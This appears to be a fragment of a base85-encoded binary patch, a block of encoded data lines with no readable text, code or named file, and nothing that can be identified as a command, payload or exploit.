zr++SB7AVa&;^R**QBZ+@EMjl2Wn2><PH5(7%7bhF$fM+Y>?Ci#sZ<c*`;jC#$VgL`
zNk>v-fT4aqQjonbz9Ul3%3Hopt&_j!qu?p9R?N`@d*2B2wGFTP^9Vh!tCM1{ziYWh
zM_(cb7o|g|#QRaOTt!jR{{rw#W-JDO_h-4h7OhP|B%AaJ`$s59>6kuCE9uLpa|kTd
zUEBwR{%DkeP}k!ZZE~OFUJzl3sB%H=C8UyY(4^h4csv`QkK#l|ti5`b-Fg$|46Qgh
zkB-HdfSz`)EBA==V0~Q6WsTrY*Tl#*dxqgEflN*gLe&P*0TkE7W(C88%@Y=$;hHx0
zLhf|p5TCDC8f?=W4jTwEGZg+2<&atnI>DBtT9KUhEP)2Q1tZ(2tB)z7<A`)#K5g%M
zEvTMa>#IggfungYo`Yp9;F;pDBW!a-C?(U0{$m_LX7innkGbvwU4CE&{R@=VUm1g2
z`$bqSeKQD$XQc+}LX;i%9er4C1gs?Sh)#tCN^N9{g!>v^a!#EBj}s#FA`Rwt8rVg@
zmKLXU{CZW9(K0ddu~4@BApt6qt^CY<69{*FBrfW-`LNw=r}|>)6RfYxt|fwpHp<(7
zy-IMe{ET&tMJS*f_EjUz3t~dUa(egN*wMFp;<umn-Rf#VHG`zN3{-Fb1$lAP(`H}e
z%s(P^_lyeG3beG(`$sjN8YJ>Of3Z@jfF0tndtEJbW<zKMK=Xe@l+oC!Nxn21P6%cR
z%;!jo66UN_`4!sWrQ@N=486jX5pyR0KHc2>E5r5e1a_eyvn-2ulBIk4AR*l(x~N|4
zpI@&&#fTJZt!{xwjbU?5f~yXho|=yx!bNE97RMBUYlZ1O+S>!!G#oUM@sAER8JFDF
zcs}1Y9#`$6i?F!!nPB0bHSAQAS_9vxB5(2Ko!S`AX(f@L0)9w}0wxC1OOV8furTnw
z{A>sl54k0|%@|DpS#`u2*~c@S^v*paVt?o?m^>jaxZG*hL-P>tHG=1N{wfZw7#%Hi
zwR+MhdwJ=uslC`Psp{nB)xEKJW_)-4Yy|z2K%gJ>>f-bLza`Hs?mL<*)_uf(u1EPT
zshRy|S3K!zhBMl;yl5k7ZN?d444m(8?jO}Yx#S`&>eo0?`PNWh^oib-_YdEK-61aQ
zVQWmzYvFWAti~D9tKQF<f^FhzT(c^vTHLw<fokOVzXA=Lx^v0@HiSpi-J_puIM~by
z!cbYHBwfqTU-Q0Oh*Y{198tN(@?!N{h_d-}wnZ-Rc55$4K0dR$3)<fGg^$fxlDD_d
z6m5r!q;flm>9<W`8!j40@UUd@wQxr@S%^a6^;-4sK`TOq<NQ=cx2@o%1#0UXD13{?
z*R4%Kp@wvvtkx^IFK5wPLxS$FvZKP8$kPOL>+tQ2-b`)I!xy|#Gvq;(36qP&V8Q{H
z4;U;xIrCABot*2Fu;bzT<qsc)-N(K1;VEt%4_mb&K+7Y{bDB-$r;6X>ut`n2v#|Ic
zN%MRJyR~}|?W^6R&VPrvnt0RG4V#r?v->wnEMC=_6IX8W<Y+P{oKn2S*fS|CO-Yuk
z$d$b{Id7t9CyofkPAZ-W$qi8g_QA6c&IixxZjHr>(<?^4Gk29Gh7*Q)ew@VB@jdZT
zaz)=fx2<G-q&rDjBYP#hxROi$OLmwtq`9=EPXCD$N{pjDD1;57MPG<4tZlF;$G@O7
zO{4quI1<MJg^{iH9e&RnVGA0-9(nx1aTL3CQhwTEo~c+=jx=$^r*4Ex0_{AZRQ7$4
zQ}OT1uaa)*Z)4^~I7W{4bWi95Yr(T0%y6}eUmG%MA@e?RFx#3}^e=PTyjZqQTXje?
zDR!ziyaabY4o%U7piXfs_-DY{)OEJzPqks+6XWV@b=GA#;j;4L*6)`?j*F7stNYan
z8Iv~Z{GkjyUs#d&ceIo&zLZ`DyZ(gt%EW0~N_|dXODaNw#P?M(f-hynx5SI&Hm-G{
zy`vqT>92eGw-v%eP99-W#rq;pDh%hNjjQL6Z2OKc7=s!^A$4LkhGa<fnuO{5N4Baf
zc+SHPA@T=eqd%3e`IE2Rd6MKxD|kiLgf1XyZUNQLp$grUEZ)`*zTbjHoX*NAmpEJb
z8%5Jze@wrLLzrvth)_7xhNI&S_tRZ7BHny#o5YdX$)2AIX`NMbLm;OS`zsJ`_0cTZ
z?L{@|{TmKu5k)ej=s@v2Dpd+x=OyGPJhSibzIbA@35|RGjlMYdI^b0LdvuW5`@WiV
z^$o{)R4LxP$E64*LEA)6<=;^I3g1`@TWe41<<Ud8t=jvO)ScX3lgfh?w*@Z|lWOkO
zl5>b!*41**L{Va{tF9l06u|;{RH{<G=lb*w<<^~Es}aJUUXa%Xx3-69k?yU<yl&p=
z!ku@)Fbc77OhG}a`QvjP^K9&Qzlj;$Vm}WqZ5ys!m+4G;Evy5tJ{*(rG%Y#;!5Ga>
z)og`Xe!qSNj`G5!Vz(ozb==976^M(aL805$oxc@b$EQ$V|Jeqj*N|H50)_I;VJMNO
z%$FYYN+%FzTr6)WoF=FAuZNO*hSa&_7YQL{hssNUsxzg!sQuBM(QNP9k#FaxX~Br|
z05=Ra0uoO07QK6)-#556r^qHJF$Cm=o6BxQ)vK;T_InXtR%FzEakKYdE=M-fj_>qa
z4xZMw@OFZw32&Un#FJr2#itBFye@)9v~NyYQ{!X2F0ytpc)0c51(BKUjwHJY{;KqZ
zf}iU=YLL0z$4viyz7dpaF{nK3iUM^>ciXamaVht-We4v*7(dp1OJ4r%MY>VTY-exV
zERuSd`PW>}pd-dt;2Oqo!9KWV^71E5A#K{X6|P{7`Bx&;!7CL+bFcC}9qCXlP}6Xg
zhgT+#wBB8iiofA_gW+60`81ZaQ=gwW`9=7qtHT+aZByd>zyVfX_|(~E-O~DSm9kjl
zLc)xxrC_RR(^IdZ?5N{d8>P3*J`)y|iN3cB7pJ5Vwe!K%`D1)z`g$8`RChFcUwkAm
z;0Z|n@&@sy=d~5g#Vi|UM*mIr3#${tOJMP>g`;tq1SqZKt%qjhNPKl6QsG7=Wnpqy
z5)LN6ucr)<QtIHcgZ=Oe>c$PeJG1ZdVTd@iV(2)>zy?=ES!{0&=Mi>xUyhkJK>8e?
zJ@+&b{Epn;7pI=lr1Sn4B9wZ2qsls#JXE&>4KirFK|{9#OR~-zPK4DH*Cs3F$(@Na
zo|flax5?y58=f1V5o$H+<oeX1zw@OrgYX*dZGDGy2XW9U)Z-kzHUe#e2&x36EjJh)
z3>13^swBq)o-o-Ow4;o`DP>2&KZXr1T8x>c?(DSkG}gTm=`=)++56pA<@FT2zvp&}
zy;$bE7yJEMcAIBQ*tX<@OLGt=6+2P{S25~f3aR4p!4CL{17D>!7U|*$QddR}YhsiG
z>jxJyL=STzuD?8^K6sp(1JIJH#6bQ5g1X1S;pH1(@y+>6puw=}!nSFF-?W6oI02(u
z!^)4=`t}ZWq}flR4+f){2{RbJt3u$dW<McNVyc-<K`4S;Qjuo&#BNW*2a}gyP<GnV
zsgllry-!M&N7uEw&hI%8+^`|{^kBR3?YX!kS8*)%7|1vn6-=$au)4YKzCggrTea|V
z&9{*6^jA7$RYVOMit+V0SiOM{zJA_8ir8}hs%cdJ2$>*ceqp`ssh9r8RgR5LRUOwu
zLv1W-XTPKS7{t#$*>elO;b-rDA@bVEH1;pL=x1|_-RKS;^HNj(9gxqiom_p~XwQVx
zcp_@%wQ&e%eOKkP!2Q8-<$K#QwKBEtB^SPz_INg?Q7M=3ZE|PnrNiBQ!xtt?417V%
zd$tB#CQjNbCr`TZ_H(&O>8mk)iM(q{87BVwD}m};Zs{gnsh<7HL4!qV))JjS8Y48?
zt7%L^!Uz;2nHZk}J-AvS+ML*OwA(&|MZ=YkSD4OFcwi{rKEo)>!K|Op%0&fsdEuq7
zJ9km{*@ApRArT1s5gEYmGc&_B4Y9~GYCD*fS<BH{vfhrcX0nEBm-o@UA08b`cn&V)
zQL;Pfixm__yoBu%COT(%fCd})iEEfY>Vb{6;yqWO*lmmU#{)K4(T$oQ3DRu?8I2fe
z`3|(0l;I7>zOA-1(gDnJuh7c#!%zPH{l3_w{B?P3k^40N){~*s<MJ&egP<U-ObeA;
zx|K<rI50j693&H-CG25x3aG=`OWOoyxM{fALIwSETy|Yo0jp?CG#;>nE0PVi0J|bj
zM`K@eT-czix2&tTPV-$f98kq3c2qDbeAO|FqJuA&T;i}%#`s_xJQK~FUapGnI5RZL
zCvI-LYiW<*jp(QrD{L8Y>9A$I5mg7vU=a0FQt8}fJ*7u#4u$N@5OxY@-?)U|hvm5B
zL(%2Ns<*rgJVIC9aEe`pMyn&dpnoqm_AqZAbzUfm+-wXtX1c5$I+of};51;N$7-V@
z%!^ag1kl*13u>VrZoZ-sqwPCBrw^(Qg)lvFPQwN>6|Ou>-d~t-@v=V-P0GWSOFZDF
zku|`~rVTi0J;IHPX(%dLZ~9V-qT{BrTxlc4f)<6N?PmK4ab&(#LDf_5=6vZhp@_-F
z^hV_Aw(S?a;R-LhYiOyD6!aY7n>e)~nopPw0INI?)Q6%<kp&Kwkw{=j7S}Z0`d-n&
zEc6jfn8Q!jw@sHzY+T(IOdkQS_NTDUcD3m&<g=CDrCPpU3~47^(b0D-3EZNBR0zU)
zK^m@YU&~nn!bE#V{|~iEZZfbAxFVPkTfUr?+cp_R{~s+n;q9ql?xaQ>xD(U~m^)F{
zPzd4T3%E!P{9wOWJ9){a{{-_tyHKFN=wn#^9<cKksR*d9pQekm2RH^lFmi+0p6$8T
zA8?%uVqaD<{F-Ib3g!AZQ9VIA4?8bzQW8db`0w}6q!TSU<nfR|d&T*pPPTCaJ!9qN
zV1X3?kNKgBVN-k=R_&20`xUl0eGifd6x(+b)v(p69SYIrw=w}nPG_9oBFs_U>aaZ+
z#kh~007fJWqMCtz$s@{6fY$3ouOg*m;t;_2{sE?#3fwSRp6vl|hv16zU=1@`7_kH-
z<Vbym;M7OUBL#;TO)N~$`U-_;m%nEpGY0j*O!K2!-YOTON;o)QVtNV|oJbQr_6F)=
z{a{{q?V%5+n?KfA_ttBm9Y$7c^*}d@^};edCvU9V0`ynU!A$jDYihL(=gmmU1>G|`
zx6wRCm;y5fK;{wrV9M}V0;Y(*>W%Lg!i#Lm0q%X{#ijVp%uGOzVip)1IlR-KD+5{g
zZnx{P7bm<F3v2(Y%m0?ZOInz&P^^RK?HzXg^%U14W+-g_Vuuf-Sm7pmG&q~%B0&+!
zIL%T}S)0BRKY9MS?)#LYId0Ghd&o)afjGQY*Tl)4Cv*A?jh(X_MacXnB}Lw<65$~S
zk1*{!m%8g8N@?*>Z>5-)*ER<>KE2Lc+XgFA@XPv??MI4sv}w^yPi#LapynPIfJZpP
zrF>$Ol_nRMzuWJbcf0w;H;^J#-1!xIkQYsX_fonKbvtP*vKMXmqn=6oFxJ^-HJ#mK
z^c@c^UuX>4Mt)n_6yyu<%u;GnZdKxn$-y1K?93Jd-d6tQ)?Gl<+VsKSyQA;3RhL(E
z^jFgtk_pLaxW2DFt|3Q0F&Vg2lCBL|k*5YL>jj~Wd!16@D=*B?Dp+}iNpt%b&DTZ;
z!)5NP$Z5q$J4<C-64uWNY}VOP<x6@^v~H~$SG-Hbhl4B}eYt!;djLV+S_vwJa8UvM
zl}6Pj=h%O%lGF*G<TIgg_gQt6>d<#Wp?mbCc-eZS_(I|C^3;O8$|hvWh7-lS+8_(-
z%r*VVI{G|Zs}x!K^}BvKg=fMU0(UZ!+II+wS-6xel4CoR0eP4t6U>YJgoUeI*O*b|
zIBnS4V*+=Ur1w5Fu#w4M=`qnpdQ4toqn>azv9XK1{YjkO^i+a|Z~dcQZso$7*+N^G
z!nl4=a_Wf~X}ZERN&0;J^2U6j*Mgq=-hpg3?Jp1eA<yWqu^P|%l^=U|o>IcI=G4(u
zP{P~ODA-A+nQ(@aPU>P+EmacH11*BL1nCL3cDKM_UkAK>p6hBVIHOjj&hOt$Cv9^H
zjiT|AtotZoWJ#*}coRSr*0fr1G1nDxPu=`M=0TdSG0pgubW<0rw%GH^Rg99F`F|1*
zHcA6M-clyL)P<J{&&r1yR)w5OZS84prXxm}`4CS0d@N2>&V+!0;nwaPS&}kmKglLc
z|CsL9?Xz#V5(L+`0yo@6y1kPB44#QJ{qQ?i5Kn};c-|+h@1h=PzFvv7jWHa#(u=HB
z9@x^fUpHCLZ9g5bD#J(O#Ju}Vbi<dzh|&~dH++96t?!?p-Ju&#y7`8~)8BW-H*YoY
zAv@yA7}5b^XU|3#ko44^JD9B<?Ad3E9rzjU_hyfDTihir2EklO^~GWU1#T*tqVDe(
zHyReO2@nCHCyTB{p8NJrIg<3SibQ?G*<>;;c9x;}x@dR4Wh(7k(o(Dxn!{h0<k1gX
zjRej2k&I_6W>Sino2x5uM50c330#YJ?DRC;7!|v!oo|t9L(%)vX(ABbQP}526i7X;
zH}ij%D?u?vdq<WokcvSYkv)fI_x@&^yl<W$Vi7`5Pxt$^oID=fa~!Fb-glCuB3jS9
z@y>X|HWXg$a_(7RIDiC1q?tthT-~`9{av^b+#JkRq}Krr*Oz)K#Uj!#ase9^LY~eH
zMir${iOzrYPtfmOHaJ-*RNf-@r3)Y`_SCIMI+h+$!jEdG*h!+rRS%<p-`S}Ll9Pl}
z1J0ps_xSvwqX>i)4k60UVJ}B_FDu@#FR*=u`R|+x*xB=MH1sfqm`>rsbnJY|apWhu
zTp~*>F8=vSY$BENo%S>_jvETxSsrH=T?gE_vPP01i`AI#FcOh`7Y|MXT9g~Pq>E%b
zg^+LGb>^Y#Fm0lU@yKl=sfEQ1X(TXL?f`S;vgVmXkhq5Jnl;eohyr)5SqW{G0*?aM
zWf+-KE`sJD#xp`8RX&IUSGta9HS!!izIv}WW}ebVN>0C|9wG;QEz}XC9#Hifj$Wvn
z0$0;<rORiZMC1Z21$HP5K^}DWf7XW8=>%&qBOHG&$NkS#{w?lkYYAC3`=kG-)Nl!~
zIJT~rdo#irH%nduWls*id{FF0NlKxE<DrW2kN=9jjWzuZt}t(5DOV{5)H5E26i~kR
zre%cLr~}MK1NLD-0h6eUyty#&^#S`@ux<V>sz`QZ+9Oz$FXTHI6FS<8ov)dIo$tXz
z2GkVT<_Pra?P~JzuA6xeX-JIrGru(}KB|~^4#2@rff3=dX;2z5<{OngdtsVNbFjrZ
zrTza1lwTU0>Hkwc_>Ls7(C@?k;FmTOoMq}Uzj)%XiKzNDB_Br!pUPeF2UUQ83Z)5E
z#qg0V?IR&-y=O00xK;3AON670f2?^<+`$jiJ`e-<!D3(`SnXrjwC8_>+9#mwIS3|%
z0Jaa?E9Z74ANBR6%x^CK1kvP?1MKaSt<M<kBi52&`;zg0Ra46tDL$wRi0-~_9y^|~
zQNkZ^YYNj!89KV$r2K!By=6d@T^BV>sDwI*fFcYfN-9W5cZfj=2r4a&(o)g_5>g5S
zf=EfDw16TVLrRI1(nCo%4Dp_82E5h#e%|-{e)vN?p6i@__Fj9fbuMNg*CSYY@xdDk
zh}C?8h!NzB*i=TGi8vo}Z>oF}n<*36M_o%F=0T0FTKkwQh3?0DY$J6&Hj2e}mg{G`
z=&$%aFmv>2Vwe-YeAQ~*SJA3T`eIbAo-_5EgbPW{1Kn+rNA!-e$lhq-uo|*UC<QPc
zm|CbmWf_-A+kknjXk4&&YGGUopvmoShg<Y&bF_2g%>Z@pzg!E_rkj>%pDM9GZA_5-
zW+|f@%xq}-#?nb0-@>GqWR#bz-U5)r9w7ZYe-5j+Mw}sXP%el|RYjaZP|B$WK9OLi
zBWR%fl+|8~n<I5!@>d=ch_RGcWo4*G+S0e)xp>+&RV$V@7{K}KWdJjBERmQrCE&2C
z`I)Y+W{U^11@e(NAi@j~CIK|D($Bjf-5-oyV{xMChGh6(*g}fD^jO>$+PWb5gpH@^
zctC4t7HDD5CzPR>W=8(12)T54r~B~oI`RJnTNtq*HT>n$A9XMW3Iif^?U=PdS#mr6
z<KSecH@{^LoyJuuud^W_F}0e7u|1=NWR1%|8zpLc9W3i5{kz4i)(54b6B&5)*nAO<
z1MtF8u<=F`3oq`NW@Xc>5mRP$Jn5xe`acyomcVL3{;4Csry^dkUHg$Md~uQBcRKo5
zBM}37<1-S?mT<xL-CATb|0_j^kG{i{vG#PfJ0I+oq8H$jrJcJiBMT44vhe%)q5VNt
zAt`EM#$?QM8l$9ku>U^h3BG|V#GrBrLh-HAZMV8Stzl6;b|?hcAqJzp6-~=-_Ji+Z
zBQ~FPhpMcF;6JX2xAYVEEWa8ey{S#JT0OAR;?5=uH|^^y+llrbt*b}s8(+K#d+LxK
zf*aVy#R(w0E-U^$%&8S*FuZ_euSIg{fx+Nrz6L>^P5boT5b4%cr8_jkM{+)%N;77X
zU$F4XT1H<zJ6A(DS?a;VbHmw6Q?comBNd|NhtgfA!M64af=3rqD5H-ly#gsK^*9e;
zj>_T!u5g94o?(pktosDLQ{GaFgbiGciq%&&<0dXpToOh5D(U1fjNr0i^~~2L7W};H
zBRju)JZ4&Vnz#`DMO(je;IaG+F%S~&MdU4?7u?YJ5lQS$R~Gj3>M&yNVdpCC6_w?N
zuYex5H-^ds^ihRc?uSQE%gvuvM`DJB;>Yj;UI>Xof5xVPZq6&dM^pR_B8zneKSM`r
z%^wKx0T<L8I2DYHn7;-cTk}8;q;AAuCDgKjEqQ{bIO-2j2O!E179gdJozX^4=!z&b
zoyYEO#eQ4G-gL1p_$VE>P7m;gez}6J^XHBD4G!>~_W2#OXg|Wp<7NKDDWgqvTAxZI
z#q<Mbbn9$%e;!X&m^m?$-O0KuwZ7ZD>6lWqu&b~ks^f%8u*<U{Q~Nwfpm2;Sy;W7m
zA~)%lf}Cq_8u?JJdg!L8v<2OsPcyRl$l9~3Y7U(4FqR6O`*oqBCz`<E9ZJ@kj~0&T
zvuvn-I^eR#)46Bw?&Y-Z=Gjh{Szn=U9T`7so9|ZEMh&~p`Yalk`7POr#oLO&pO{u!
zO|&kW{a)pQvbN2$*^SgGx(2rYvHsmKeUaKp0&;7dpH0oaIz{T2k;RuK1kyv`kKGxB
zx|++bvyM_G0A*`0)A4aTdb$l^{I(;-JbyO7-@M(KcbD~v_->-clf;Oe9l6XWc+pF%
za<L<LUGb_^ul5oOJ&f#FoJ6e`9;y`dTxwal!OF2Q&6>jpCr=f3l8N0@LpdI|q=Ti2
zr_U;Qe1lH_Lu@|a?0#is<@W;T1Cul;O?=IBqMvU6$-<}L2Tt2vd-kgxxmW$Ho(C@!
zTkFO|j5>-BYd&7a2j4z01oY%K{>=&S#(}(tdQGv%<ZC$8sp5+0Q~bv~b+*o&#~2xH
zoNBc;gccPk^}~qsu-sWkUpR}7KEi2%c(L#($SUtOLohDsXCtsXBy-;5gT!(Wb-wya
zBz6ye#dKk>{dh;<hc~PN>_b{cO5iKNrb*%%6g@I|xpx`N_Wk0dtA1Ab8gF~|P)Cf~
z#@}@QP!%Y2h2}+?xL;@C@Jh|ns$ay9X(iZ7b_ve&v*MrmzKfvhLNCK=J_byayg%9F
zLGx;_h2vz7psVI1t%|a$(X*^|3+|Q0Q%CS!BdoG?4Y$cqm>m|yri?%iQXQv?EnI<h
zeh=f9i|l4d4Ooph;In)jdTCV5{zy<+3ls!ST{1cFXP#mFnUffQ#vOxWyr0j>(<*oX
z_YNH7Zlapjmba|%b6vywE;^fMyt{%aUehEu(c-Ic;z8Jh4_$PX94dj$Zcj2{^6FQ1
zs~AUD)7UD~#OG>8RtXSg(`}KECHZ5wiVp4N<y9&Uveq>>>G^^YSQY_q&)#Ow*t8P5
zr=wI{6E<{)TD-C*+$Nd40*yPA1m$Y^dw1|SmO32q=Hk~Q0~IUtN_k5*m2<~{zJeu3
zIC``bjS5&?bM(lJpDtd#c^g!0h{0<gmx2yB%izxT&wQ;Z`$(|S*f?`OVx-UHwGqz;
zd`~uk%3k2jLMf&A<6lB62oZ$y*BU-?I}eUJEp3*JOTM1bHk?T@dw<8|?Ol#dA7Zvr
zg?`Uv>v`uZNo8x#qN0;Wh4?c*x9c%Y#JN5b*m&33@I5@aEPl=5hW=npy@JQ^leeci
zH{@8e`R;E`lQddy+Ywi!ipP@>JlDN2EA}H-TV-=S*JgL!QrXR8od7Y~xv>@bMyulD
zIoM*Fwa6~RMc87s%ErLl%ls3rz{A;@JEj&WupKG}Nle$(t<{3vZ$p+KhYglHCg)z_
z)%gX7)<|=KhOnEW59!}fv3Ss!D$d-11mN4Yfs04ONvMaIMc@f4wKk*gXUQ1kCm1_d
zC)HxEjR;1kiN|};9zo4LkZ``TE4aG%jry|(B4t#FP9npqEb*M8$JcY!t7$ioU38J_
zY2vIcrP{C(p5np9C*CSr^Qx>K-}Gd==s3x`;-yX9yC?l>rbExdQpH(aOSQwS<{mz2
zUiC|l*yC6pYjk~%Ty?$0&9y5@>84z<c9W}8X?f1!#>hZT{hFrJhs$iT7gy=rjG3p3
z_lV3$3B<N{7K^FBFp^mDhgmDru->W}sLQFCck~#(TAWU9vl{iRk7$&T<7B+M@%GB%
z!xzcq-6K6=Xq(Uc@ZCA^nSfEdaZ}6avB^Bg8r}V$#rr!y<M-!sJkTq28_bN3##C1)
z9*m`mFW&DCj)2RlW{OFww=*yL3+!ezEnMpmgJ155)ty6&-JYCpD;oE-%?r?WbxOXc
zwNusAf&BQ|yR&XXZk$QG!sp{UvVxYQBi4k+X4)=c(~Z%RlZMB);N<*|WB_oxIDs9F
zB+~R_*~-3NF60U0`u>-NH&`O!EF63e!d?9DTy^7KB5?z~fOZM}>2hJ&BXV1M@f@R`
zu<BO}^!sNE1q1u{b66`Jcy^bjLvQ^2Qa`lszV9Nc2BVUM5pWV*>VLZUFp`>8Rx&p3
z!M8v~<x_iKWhCKJ15vw{wBXi5DSU=ChUzDUOw;M*qG86)^}2=>T3|3uaWaf?;hrD<
zDg!SWymjjKWqccX4hE}RFvYXfJsiVz)kxf6mD&znDP!jJkm1wI(<Yf?M5k_7SkQ+w
zUL3b*l$-@nvq-{AOAu6t8RcKYQ<ffb<w1`XwZFlcyeN1r)K>2<GNh!3;68x*uIwzZ
z?`qz?oE4U|NFWbqO<12VtGGyz2Ozm-f2psWt~CDWbAe<27*&=B1VqikZAW)M3Hz4w
zK$t?qfSCsjwHTF_ckPWxTyENTnO8ii62@orn!mKn#6a2riF;fO0ygzD0BnR}Ze@4G
zRcRL8H6cGHzI-rSkY4AJ7JN~xd(1OYeNg0%J<d*z%vnVRHG)eQD-!2~M;sT@Bgd+U
zecVobp73<avnfu#0&^<SR73VK4h)?&8iJd@HK?XxeW`6pE#Y*>edwh*-QH&!rvcBZ
z+kK@pPHuLS`+GW%K(e3#X;a^*{UDCWB(Ds}7NuD%+G>?A-oDuKL40p(L%aO7+g2rd
zPYzhyh^dD#E5P|r;NA{X(LzHk<+1ND<ACPcb6&I1jwE*AY+r?(?NEIGr+?6x*Sx1N
z1n;w3>&P595S%0k6)FcHatX;o0Z$glOhf@60X)E?_`7A=X1TDx3TcB^7CP9zn>{AM
zqc}Fyxp+Xc%ql9rb724#ujJw2Rr*6SbM^TXMfB|2<e3f8pa!qmhi<uBKi`|9$%D<G
zCZG3ax^vF+?EAavT|8g!ai>Qzd9P209xwF}ulP9OK+7Iib=mLT^I+=8S>YE$;DcKg
z6If+&rpEm)hH(k2C7z3%eeN_gi*u7UvLWAPXgX5*8#uX<{TUBNuzHDa(CQmMK^ERa
zsV@sxt_kMPB40><E8g~NH1@gAO7b#LB1VmZ(5ZvaH_fq%!{%m%TzXp?cyYFqw)2Or
zHL$%EgU{9Wd=SrO!(XgEG4%>fPoh04lG>O+<$7}W`$e&19g1$vRp5Tv@1h=&N+6qn
zr~2;J<TJ%9m)`Jsi|>o<;+blM!YLy|45*vG)PnW(Lz(3fA_Y;zLa1fF1Qbylk2dsZ
zifMmAvRg9)6n#$uD~KM20oxURyA#p|n|9<7iM)Y6m?Db|O3v#Thr>)moQ&YJsuM&f
zA`7hqleMADR2&HgCtTG8&C!7XOm)n&n+TdiqsR)YQmmsQ{~qCoglq)uzVgXM;FH)$
zurmYuCgOqlbBwL-0qL0gf*87tHzW$ZhY$+>4$<X33|$_AZVukV!K{6VITx4*WUCk2
zf|5BF3fO)v>2B%InGG7`-b?X{{F5LAvqRcLcFLc7dj-~ut6V)08?91c@E7q{>fYU3
z`yS^xYe$S8<O=!l!Aw!W$>KWYvrBMt-pX=kh|}TM+={X4HnIC2r~IM<1aK0EG|x%e
zJEf!p_O%fLXRGL1nLyL&N!a_u^IOHS!EB$-_^UXJ#=VD`qdL~CF!_LT3@vZoYfe&!
z-MmeM&z5FTt$LfDtQ(iG%!9xjrNf$O5ZSaKsHXF1M^E<scj;x?*K^$a%k$jOP!;%X
zwjB3Vp;@&4&~XLG)=~jh2e>bIUQ^CgRA@`m$QFW&=;C5MxKsFGOELiL1-6PwWoHmz
zWp)yAD}Wvg(2JR1CS(El(MIlN=-NRJdo2Otx2)G4aUS+~*~T--MUJ9hAOYe1a*V#&
zlHFq*GYdE-DBV#|x@SPvKNx_yl?cUNeVC%4WchWoLFVW7apLge0y6~M;d7xN-tO51
z<)n%;kS!A6SN8q!B`U=4qLjDr37zi^*F}Kt0LN#OgYKMBzmEDI8+IAplJ7<2QLU;U
zmMIZ683F3B;{#}=!28Y-O+WK0PS0zA{fLJ(<$P_bQ3E@Mk00qK)n*4fhW_78lwn^e
zqhAwUWj~tp`F-bCO|R1ey<?%9n4Ym{f#IvR)GT#+S8t&(%eBmXx?y3FOkVc;p3@O>
z8L^kp-7ln3B=qA(A8`@kAO?5Yf35c5F~MWe(kST82m}^lx5wBqfz@<A2rL0RHYt=s
z%h4wtoP@vpS6o0w#6ub3YX4X4!CEOUQ$tc&ZLcM9`N7zzr$*tUKf+H9o($Dt#tvp7
zNL(P#fuck}1(LE1)hS3s;Fuu9?b1I3(w2_!%lPb^sZRUWR^Vz!(~G8suT5{&bV6y;
zmQAoJq6|vV{=_$McA1!iQ78DY%z_9v@-Rk7qm+_u`<>&ULcb5)eL?BU1S|DLqmKz=
zL)r!<Nw$zF+72qz!~3oHU~r)q(bSl)OCzYZC&QLD*LDLy66XF4nu8A%&}}wm;AiAO
z|G!))0TKQZ*x4OT9Z*NLM1hxUppDSJYsjYqM_&=vWOml{&nG}wf{9cU6sauy^gjbJ
znoG@Eq51oe(F6tmzgA(2!WJDn_LA<eDSpMW!uG#o8UHJm8o$R9)JlR-lA6x$BYS1`
zP!+*@>n7?T3{q?!D(oaV2!3FB<b43gaht}oy;-VsP`x?6Dxk_dvPl=p3N8C~zAQi@
zxe{z2WAJ8;r(3dg5PClYeFTkNDTwYS(fUM2Cgb`M;n<jTnA3OH9864ekRcl(SFzgx
z;QCQ0My1wEv0O-^-bO9)JwQUhQ$X=A+{LB`h&z}UdXfNU!SMDb2*XpB|C!?VqOH|;
zv~*R)2DN+wz=w@Z?@9QON6=qsj&lGZ4}YQ1AIWiebeJhHIHu~nqV`_o8p_%{3BiZ}
zWe(-2C|3bETZ(u+-3)|ZydFT{kY2J`YxDE4wtn<m7j`I5dkmCnLD90SY~92HNF6DZ
z>7)cIf^+M@Hc*3A@5Noftb_k<ho#kF-Irl<eHDg|jNmQ^%m(=$FKnCcTKB;gT_4F^
zKnyLY8#C2yn(L_bI@XI2niwDnvM?9AIUthB<1?l=NeP6uW^m3SZ~GR3B=&x3qHfst
zKIGui7u((b4S7S@eEKW+<zpqCmR8t=jD%38-X`V8Ak@l#tD6LD^}9AhNk4|e_7`@0
z9vmNb0U%8vEHp=PvH7Wzy^l@bd6KA3o3i|5HUM0aBdlal8vS#@5lKSF9s>BsAgX(j
z&;b_mWWm{n{F`#lnxpjDtl~0-9;m_6m@>W7cW#!J-D&1Rc;_l%Z>|pl`$xv+9b|qM
zz-9iV<)2d6)43xT)HL!{#{LvS7t9OwtdR8(Hxkqdwj6*0TI?nl?;uGo)-%LDvQG#a
zHI>q&$ws_=X{`RJFC%1^&QRI;!;*~vn@NiQ+gqq=&}?oyuN2sn056ji2}dk^Ij5#$
z;R?@26adYTVmorgrZ)ZaR<yv5r4>+WEw{JkV<l1D^>rhTE(ZU<rsxyUVwVG5GNj3I
z5?ZPls5MEp{gI6O&OS{`UuD?k*fvVbt~Qf8CgdV%(BcgV%jRQa3F@?3>|oHS|2xE3
zMu33n`yF%Lqg(sy7JbdK=o(Hhfy#XGf+q03-jNqgyOvh($i2I#!DwYcTIE_VwRuOE
zhml?a6LES&Z+Ox__m|8pmX_rm?5vFO8mhHzHG~>!m<2`^Lfq-D;v6a;hvtG2=R>+w
z@5q6Lc_s;kHCcUaGEf@~0f2uIf(2~m0`>AcEP$+9ZV9|p+MV}5IKg3FVWtTE7uJG>
z%~?^dV5tXY%=4Os^&$@nlEzIT1l`T6cVA%o(-UKejA2v!C6wYwTs1`uZ~E0}u?+AY
zo9-W&JL7*_FgC^%bsgniTwG>p@DRl^tGb1q;($5)D*UZC_njZTcMSz?HVR8&%u!Vz
zmUl}}q{oI#>(s5)Oso{i0fYd-dVen@<8$2T5yx@mt<et0A<`ktvXuh|F`zhz>8VeU
z2i>d<bhC1L1p3F|y1>(iDDepM+`!v{aAh?Dl`YJWpLt{5Hmy);9?QZ|1bbdUgWkB>
zdj^fAgJhNf@Ec8W&mn6p2D|(J)xCB96Q1SaVD~6IOn=9WD1lNNtwE&fteRQH2H;bI
z>n^U;LXP`Wb)Cyd9`;k~9}l1OE6(W{GO0-eAw5J+b1+l{e!#5kYt!M74uyhak+aBx
z0N?xrcI{rr+zYxLmV9B*#D*Rro&i|XXIhsBNw1|*8d~h21m-H<T|w}t1Tq$ZFR>>F
zV?eC>9SK)M`aUclfbbTGUe4*%<y1ABFtSxFM;inc`EZEglpk`VN)ONujpXICAC|#P
zN)!ixaS-(+famV;;(thkiMj&oD7X&<?^_FGwyP5;3$i#H%SLLmRiOUw>=rYJ7%TxJ
